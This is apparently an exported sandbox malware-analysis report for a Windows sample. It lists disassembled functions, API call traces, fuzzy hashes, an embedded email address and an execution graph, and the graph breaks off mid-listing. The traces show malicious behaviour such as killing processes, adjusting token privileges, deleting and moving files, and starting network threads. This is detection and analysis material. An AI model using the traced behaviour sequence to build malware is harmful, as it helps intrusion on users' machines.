                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 99b8175f4789665816ee58ce95148e85964884c2d1b05ba2febfe70cb83b4eb1
                                                        • Instruction ID: d9274a69ea71e40b52450c2f1abff6bb4cc12b44bfabd653b35ee0167fd8c358
                                                        • Opcode Fuzzy Hash: 99b8175f4789665816ee58ce95148e85964884c2d1b05ba2febfe70cb83b4eb1
                                                        • Instruction Fuzzy Hash: 5A213B7161435DBFEB11AF25CC80FABBFADFB44384F40052AB59852160D7716D289BA1
                                                        Function 00401349 Relevance: 13.6, APIs: 9, Instructions: 74windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageA.USER32(?), ref: 0040137B
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 0040138A
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 00401399
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 004013B5
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004013C1
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 004013D3
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 004013EF
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004013FB
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 0040140D
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 305f06924834a9908d84543f76578ecc6405ed01a93ac79d48c62636bf4700f6
                                                        • Instruction ID: 56a25f80e609cbd08b066c68ee1e37c059073ee632eaa49d0b548e2ccd918b9e
                                                        • Opcode Fuzzy Hash: 305f06924834a9908d84543f76578ecc6405ed01a93ac79d48c62636bf4700f6
                                                        • Instruction Fuzzy Hash: 49215CB160535DBFEB21AF258C80FABFFADFB44394F00052AB59852060C7716D28DBA1
                                                        Function 00401000 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: #567$#324BrushCreateH_prologSolid
                                                        • String ID: D@
                                                        • API String ID: 1271399592-116940557
                                                        • Opcode ID: a93d2b0ed926015932f3efea9d707e5f8f5c25ad2ce72d1844b1993bb421de03
                                                        • Instruction ID: 13884b46de095b52d8f8717c358092e8eec3470aa280cab25804e1b70b61f98b
                                                        • Opcode Fuzzy Hash: a93d2b0ed926015932f3efea9d707e5f8f5c25ad2ce72d1844b1993bb421de03
                                                        • Instruction Fuzzy Hash: 9D01FCB16003549BDB209F69C58978EBBE0FF81348F00443EE9926B2C2C7B85A08D765
                                                        Function 00402226 Relevance: 10.5, APIs: 7, Instructions: 46windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,00402216), ref: 00402237
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00402252
                                                        • #3286.MFC42(-00000001,?,?,?,?,?,00402216), ref: 00402261
                                                        • #825.MFC42(?,-00000001,?,?,?,?,?,00402216), ref: 0040226F
                                                        • #825.MFC42(00000000,?,-00000001,?,?,?,?,?,00402216), ref: 00402275
                                                        • SendMessageA.USER32(?,00001008,-00000001,00000000), ref: 0040228A
                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,00402216), ref: 00402294
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: #825CriticalMessageSectionSend$#3286EnterLeave
                                                        • String ID:
                                                        • API String ID: 2141797828-0
                                                        • Opcode ID: 345f4108f9338b5cd1efb657daf810a46913b3e0c3edca353be0c7de5a5d4693
                                                        • Instruction ID: b9e60a6790c5ed3c642633d5835f906307b00da717bc424c3a2b37c864f405ef
                                                        • Opcode Fuzzy Hash: 345f4108f9338b5cd1efb657daf810a46913b3e0c3edca353be0c7de5a5d4693
                                                        • Instruction Fuzzy Hash: 64F0F472205215BFE2156B61EE09F8BBB58FF84321F10013BF709B20E19BF4680096A8
                                                        Function 00401E2A Relevance: 10.5, APIs: 7, Instructions: 42windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 00401E2F
                                                        • #324.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E41
                                                        • #567.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E4F
                                                        • #567.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E66
                                                        • #1168.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E91
                                                        • #1146.MFC42(00000080,0000000E,00000080,00000066,?,?,?,?,00401C92,00000000), ref: 00401E9F
                                                        • LoadIconA.USER32(00000000,00000080), ref: 00401EA5
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: #567$#1146#1168#324H_prologIconLoad
                                                        • String ID:
                                                        • API String ID: 2995884226-0
                                                        • Opcode ID: e9fea58024a95a92706cb3ea0515c02a4b245b0f3a3af034628e2e1244cc45d7
                                                        • Instruction ID: 6195de06ed0686a01f6ea18af6a3778e2a15774cd3760b5cb09f72b4f9ec5dc5
                                                        • Opcode Fuzzy Hash: e9fea58024a95a92706cb3ea0515c02a4b245b0f3a3af034628e2e1244cc45d7
                                                        • Instruction Fuzzy Hash: EF01C0B1A00384AAD711EB65C50979FBBA4FF91308F00887EE586732C1C7F81604D7A9
                                                        Function 0040174F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • ekimhuqcroanflvzgdjtxypswb, xrefs: 0040175B
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: rand$CountTicksrand
                                                        • String ID: ekimhuqcroanflvzgdjtxypswb
                                                        • API String ID: 3923125369-3762667353
                                                        • Opcode ID: 759b461be63a90c0a6722cfee258f62135b3283f7b68fc9f86cb98f3e6b20c4e
                                                        • Instruction ID: 0f0927eb61d3c32e8c18992b3a3ed773e98e9a1b9926048b9e47f112dc32a9e4
                                                        • Opcode Fuzzy Hash: 759b461be63a90c0a6722cfee258f62135b3283f7b68fc9f86cb98f3e6b20c4e
                                                        • Instruction Fuzzy Hash: 1FF04C33B0030457C7107F6A6984D9BBB999BC9720F01403EFE046B281C6B5940286B4
                                                        Function 00401D6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 00401D74
                                                        • #324.MFC42(00000064,00000000), ref: 00401D85
                                                        • #540.MFC42(00000064,00000000), ref: 00401D93
                                                        • #860.MFC42(RedTom21@HotMail.com,00000064,00000000), ref: 00401DA9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: #324#540#860H_prolog
                                                        • String ID: RedTom21@HotMail.com
                                                        • API String ID: 1715175771-4020391281
                                                        • Opcode ID: 2e6038b0c2a3161042f3a77bc08ef84b8c52d66f33703c1b03fec492057627b6
                                                        • Instruction ID: 78d62cf22874564550b960a1e2f1980c8c55d506c68ef3259133a31bc2e11175
                                                        • Opcode Fuzzy Hash: 2e6038b0c2a3161042f3a77bc08ef84b8c52d66f33703c1b03fec492057627b6
                                                        • Instruction Fuzzy Hash: 9FE06571B403509BD714AB99C50A79EB6A9EF91714F10447FA902773C1C7FC6E009699
                                                        Function 004017B2 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004017ED
                                                        • memset.MSVCRT ref: 00401814
                                                        • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 0040182C
                                                        • memcpy.MSVCRT(?,?,?), ref: 00401847
                                                        • CloseHandle.KERNEL32(?), ref: 00401859
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleReadmemcpymemset
                                                        • String ID:
                                                        • API String ID: 3052882905-0
                                                        • Opcode ID: 44267068a63abdb27b6f021e64f533e27db4bc8761671b15b42d38a0f2456496
                                                        • Instruction ID: e342418d90b68a1d807531b6c152f1c53a72d441e6209e681be522bd43cf2dcc
                                                        • Opcode Fuzzy Hash: 44267068a63abdb27b6f021e64f533e27db4bc8761671b15b42d38a0f2456496
                                                        • Instruction Fuzzy Hash: 8111BEB2900148BFDB119F98CC81BDA37ADEB08355F108076F709F6190D2B0AF848B68
                                                        Function 004024DF Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClientRect.USER32(?,?), ref: 004024F1
                                                        • _ftol.MSVCRT ref: 00402517
                                                        • _ftol.MSVCRT ref: 00402525
                                                        • #4299.MFC42(0000000F,00000041,?,?,00000001), ref: 00402549
                                                        • #4299.MFC42(0000000F,?,?,000000F1,00000001), ref: 0040256B
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: #4299_ftol$ClientRect
                                                        • String ID:
                                                        • API String ID: 3171108694-0
                                                        • Opcode ID: 5b5269a8b2c3e4b0ac480d2bf8ec9612011b5aad8df481b47eb0e60a219a1807
                                                        • Instruction ID: 3880c801f612beb6246e745b78d7e2d3a19b48e5053d162d2e00decfba834721
                                                        • Opcode Fuzzy Hash: 5b5269a8b2c3e4b0ac480d2bf8ec9612011b5aad8df481b47eb0e60a219a1807
                                                        • Instruction Fuzzy Hash: C51151B1A00209BFDB10DBA9DE59BAEB778FF40744F10027AF501B61E5D7B49D40DA28
                                                        Function 004020DA Relevance: 7.5, APIs: 5, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 004020DF
                                                        • #2379.MFC42 ref: 00402125
                                                          • Part of subcall function 00401D6F: _EH_prolog.MSVCRT ref: 00401D74
                                                          • Part of subcall function 00401D6F: #324.MFC42(00000064,00000000), ref: 00401D85
                                                          • Part of subcall function 00401D6F: #540.MFC42(00000064,00000000), ref: 00401D93
                                                          • Part of subcall function 00401D6F: #860.MFC42(RedTom21@HotMail.com,00000064,00000000), ref: 00401DA9
                                                        • #2514.MFC42 ref: 00402103
                                                        • #800.MFC42 ref: 00402112
                                                        • #641.MFC42 ref: 0040211E
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: H_prolog$#2379#2514#324#540#641#800#860
                                                        • String ID:
                                                        • API String ID: 1337987987-0
                                                        • Opcode ID: a4f86554920c1d60b447a310fd9ec504fb6ed513b6fab3962996ee4d40a29264
                                                        • Instruction ID: 0c37060d93abf7ffef3ab529cf96d0046ab1b8bea522c7ef1cdfd7726eb284c9
                                                        • Opcode Fuzzy Hash: a4f86554920c1d60b447a310fd9ec504fb6ed513b6fab3962996ee4d40a29264
                                                        • Instruction Fuzzy Hash: 09F0FE71810518DADB25EFA5C65A7ACB730BF20314F60417FA412761D2DBBC5A09CA59
                                                        Function 004010A8 Relevance: 7.5, APIs: 5, Instructions: 23COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: #656$#641H_prolog
                                                        • String ID:
                                                        • API String ID: 2321568657-0
                                                        • Opcode ID: 2301cf39d9f84a458cdb1385a3b7908f8fb3180347b8e91d03edffd7431175f3
                                                        • Instruction ID: e680012da702e7b92035de08c4d7561f67a84a50463a6348afc1be6ddfe969e7
                                                        • Opcode Fuzzy Hash: 2301cf39d9f84a458cdb1385a3b7908f8fb3180347b8e91d03edffd7431175f3
                                                        • Instruction Fuzzy Hash: 5DF03071915654DADB2CEBA5CA197DDBBA4BF04318F00456FE066732C2CBF81B08C755
                                                        Function 004015CD Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • #2379.MFC42 ref: 004015D2
                                                        • #4299.MFC42(00000000,00000000,00000028,?,00000001), ref: 00401602
                                                        • #4299.MFC42(00000032,00000000,0000012C,?,00000001), ref: 00401624
                                                        • #4299.MFC42(00000168,00000000,00000000,?,00000001), ref: 00401645
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: #4299$#2379
                                                        • String ID:
                                                        • API String ID: 453929936-0
                                                        • Opcode ID: dc378f647d04030cb087140241a589892729b93da9fee3e182db44f2421a5fcb
                                                        • Instruction ID: 396461380f4f282afe083d313e8dd4ae14482c7760a999395c5db5fab6d4a27c
                                                        • Opcode Fuzzy Hash: dc378f647d04030cb087140241a589892729b93da9fee3e182db44f2421a5fcb
                                                        • Instruction Fuzzy Hash: AF01B131240700ABD5318A59CC81FABB3AAAFC4B05F280E2FF183391D1D7BB8841C619
                                                        Function 00401CEC Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: #609#641#693H_prolog
                                                        • String ID:
                                                        • API String ID: 432028610-0
                                                        • Opcode ID: 8fceb26bd7cd2eda50943f19653515a01d97790802a6fa3cf18d9ab7d8ca528c
                                                        • Instruction ID: c1b141184ca5cae31352d23a373f4eac66a41ce64f7327093406d0e5d71bec99
                                                        • Opcode Fuzzy Hash: 8fceb26bd7cd2eda50943f19653515a01d97790802a6fa3cf18d9ab7d8ca528c
                                                        • Instruction Fuzzy Hash: F3F0A070920664DACB18FBA4C6193DDBBB8AF14308F00466FA062732C2CBF81B04C795

                                                        Execution Graph

                                                        Execution Coverage:10.5%
                                                        Dynamic/Decrypted Code Coverage:4.4%
                                                        Signature Coverage:3.2%
                                                        Total number of Nodes:950
                                                        Total number of Limit Nodes:29
                                                        execution_graph 6779 1001121c 6780 10011238 6779->6780 6782 1001122f 6779->6782 6780->6782 6786 10011260 6780->6786 6787 10011171 6780->6787 6783 10011280 6782->6783 6784 10011171 3 API calls 6782->6784 6782->6786 6785 10011171 3 API calls 6783->6785 6783->6786 6784->6783 6785->6786 6788 10011179 6787->6788 6789 100111af 6788->6789 6790 100111d9 6788->6790 6791 1001119a malloc 6788->6791 6789->6782 6790->6789 6793 10011206 free 6790->6793 6791->6789 6792 100111b3 _initterm 6791->6792 6792->6789 6793->6789 6870 10011036 ??1type_info@@UAE 6871 10011045 6870->6871 5793 10002640 5794 10002650 5793->5794 5795 10001000 lstrcpy 5794->5795 5796 1000265a GetProcAddress 5795->5796 6908 10011859 6911 100118a2 6908->6911 6910 10011861 6912 100118b2 6911->6912 6913 100118c6 6912->6913 6914 100118bf LocalFree 6912->6914 6913->6910 6914->6913 6935 1000846c 6936 1000846f RegCloseKey 6935->6936 6949 10001470 6950 10001480 LoadLibraryA 6949->6950 7671 10011672 7676 1001167c 7671->7676 7674 10010feb 2 API calls 7675 10011698 7674->7675 7679 10011799 7676->7679 7680 100117a8 7679->7680 7681 10011677 7679->7681 7680->7681 7682 100117f5 _CxxThrowException 7680->7682 7681->7674 7682->7681 6760 f30063 6761 f30067 6760->6761 6762 f300c3 6761->6762 6763 f3006b VirtualAlloc 6761->6763 6763->6762 6764 f30084 6763->6764 6765 f300b5 VirtualFree 6764->6765 6765->6762 6987 10011498 6988 100114a4 6987->6988 6990 10011a66 6988->6990 6992 10011ac4 6990->6992 6991 10011b09 LoadLibraryA 6993 10011b59 InterlockedExchange 6991->6993 6994 10011b18 GetLastError 6991->6994 6992->6991 6992->6993 6995 10011b7b 6992->6995 7005 10011bd7 6992->7005 6999 10011b67 6993->6999 7000 10011b8d FreeLibrary 6993->7000 6997 10011b38 RaiseException 6994->6997 6998 10011b2a 6994->6998 6996 10011beb GetProcAddress 6995->6996 6995->7005 7002 10011bfb GetLastError 6996->7002 6996->7005 6997->7005 6998->6993 6998->6997 6999->6995 7001 10011b6d LocalAlloc 6999->7001 7000->6995 7001->6995 7003 10011c0d 7002->7003 7004 10011c1b RaiseException 7003->7004 7003->7005 7004->7005 7005->6988 5781 100014a0 5782 100014b0 LoadLibraryA 5781->5782 7777 100112cc 7778 100112d8 7777->7778 7779 10011a66 9 API calls 7778->7779 7780 100112e2 7779->7780 7079 f3102b GetProcAddress 7080 f3002a 7081 f3002c 7080->7081 7082 f30056 7081->7082 7089 f30047 7081->7089 7085 f30045 7085->7082 7093 f30063 7085->7093 7086 f300aa VirtualFree 7086->7082 7090 f3004b 7089->7090 7091 f30063 2 API calls 7090->7091 7092 f3003b 7090->7092 7091->7092 7092->7085 7092->7086 7094 f30067 7093->7094 7095 f300c3 7094->7095 7096 f3006b VirtualAlloc 7094->7096 7095->7082 7096->7095 7097 f30084 7096->7097 7098 f300b5 VirtualFree 7097->7098 7098->7095 7140 f31009 LoadLibraryA 7839 100112fe 7840 1001130a 7839->7840 7841 10011a66 9 API calls 7840->7841 7841->7840 5797 1000bb20 5854 10006aa0 7 API calls 5797->5854 5800 1000bb53 CreateMutexA GetLastError 5803 1000bb74 5800->5803 5804 1000bdff wsprintfA WinExec 5800->5804 5801 1000bb3c GetCurrentProcessId 5891 10004ff0 OpenProcess 5801->5891 5803->5804 5806 1000bb7d 5803->5806 5807 1000be45 Sleep DeleteFileA 5804->5807 5808 1000be57 5804->5808 5805 1000bb48 ExitProcess 5858 10004f60 GetCurrentProcess OpenProcessToken 5806->5858 5807->5808 5810 1000bb89 5862 10004a10 PathFileExistsA 5810->5862 5812 1000bb9a 5813 1000bc45 CreateThread Sleep 5812->5813 5863 100051b0 LoadLibraryA GetProcAddress GetExtendedUdpTable 5812->5863 5814 1000bcf4 WSAStartup CreateThread CreateThread Sleep 5813->5814 5815 1000bc6d 5813->5815 6089 10009280 5813->6089 5878 10006c40 GetVersionExA 5814->5878 6078 10008e10 WSAStartup 5814->6078 6084 1000b5e0 5814->6084 5817 10001000 lstrcpy 5815->5817 5822 1000bc77 5817->5822 5819 1000bbb2 5820 1000bbc8 5819->5820 5821 1000bbba 5819->5821 5874 10004b40 CreateFileA 5820->5874 5896 10005030 5821->5896 5826 10001000 lstrcpy 5822->5826 5823 1000bd59 5827 1000bd61 CreateThread 5823->5827 5828 1000bd72 CreateThread Sleep CreateThread 5823->5828 5832 1000bca3 5826->5832 5827->5828 6122 10009530 5827->6122 5881 1000b8e0 5828->5881 6092 1000b6a0 GetSystemDirectoryA GetSystemDirectoryA 5828->6092 6105 100055e0 9 API calls 5828->6105 5830 1000bbc5 5830->5820 5831 1000bbe4 5875 10004a80 SetFilePointer 5831->5875 5835 10001000 lstrcpy 5832->5835 5833 1000bda0 CreateThread Sleep 5886 10005180 5833->5886 6055 10009290 5833->6055 5838 1000bccf 5835->5838 5837 1000bbf2 5876 10004a50 CloseHandle 5837->5876 5838->5814 5841 1000bdc1 Sleep CreateThread 5842 1000bdd9 Sleep CreateThread Sleep 5841->5842 6138 10008d40 5841->6138 5844 1000bdf6 Sleep 5842->5844 6132 1000b9b0 5842->6132 5843 1000bbf8 5877 10004a10 PathFileExistsA 5843->5877 5844->5844 5846 1000bc02 5847 1000bc23 5846->5847 5848 1000bc09 5846->5848 5849 1000bc3c 5847->5849 5850 1000bc2e Sleep DeleteFileA 5847->5850 5910 100049c0 ShellExecuteA 5848->5910 5849->5813 5911 10009130 strstr 5849->5911 5850->5849 5852 1000bc20 5852->5847 5855 10006b6b 5854->5855 5856 10006b85 PathFileExistsA 5855->5856 5925 1000c100 5855->5925 5856->5800 5856->5801 5859 10004fe4 5858->5859 5860 10004f7b LookupPrivilegeValueA 5858->5860 5859->5810 5860->5859 5861 10004f91 AdjustTokenPrivileges CloseHandle 5860->5861 5861->5810 5862->5812 5864 10005205 malloc 5863->5864 5865 100051f7 5863->5865 5867 10005222 GetExtendedUdpTable 5864->5867 5868 10005219 5864->5868 5865->5864 5866 100051fc 5865->5866 5866->5819 5869 10005236 5867->5869 5870 1000523e 5867->5870 5868->5819 5869->5819 5871 10005279 free FreeLibrary 5870->5871 5872 1000524f htons 5870->5872 5873 1000526c 5870->5873 5871->5819 5872->5870 5872->5873 5873->5871 5874->5831 5875->5837 5876->5843 5877->5846 5879 10006c94 sprintf 5878->5879 5879->5823 5882 10001000 lstrcpy 5881->5882 5883 1000b939 5882->5883 5950 1000a9f0 5883->5950 5885 1000b947 wsprintfA DeleteFileA wsprintfA DeleteFileA DeleteFileA 5885->5833 5887 10001000 lstrcpy 5886->5887 5888 1000518b 5887->5888 6015 10004ca0 RegOpenKeyExA 5888->6015 5890 100051a2 5890->5841 5890->5842 5892 10005009 TerminateProcess 5891->5892 5893 1000502a 5891->5893 5894 10005024 CloseHandle 5892->5894 5895 10005017 CloseHandle 5892->5895 5893->5805 5894->5893 5895->5805 5897 1000504c 5896->5897 5898 10005050 5897->5898 5899 10005069 GetCurrentProcessId 5897->5899 6016 10004da0 5898->6016 5901 10005093 5899->5901 5902 1000507a 5899->5902 5905 10004ff0 4 API calls 5901->5905 5904 10004da0 11 API calls 5902->5904 5906 10005086 5904->5906 5907 1000509a 6 API calls 5905->5907 5906->5830 5908 100050e1 GetTickCount wsprintfA MoveFileExA 5907->5908 5909 1000511b 5907->5909 5908->5909 5909->5830 5910->5852 5912 10009258 5911->5912 5914 10009166 5911->5914 5912->5813 5913 1000918d 5916 10006c40 2 API calls 5913->5916 5914->5913 5915 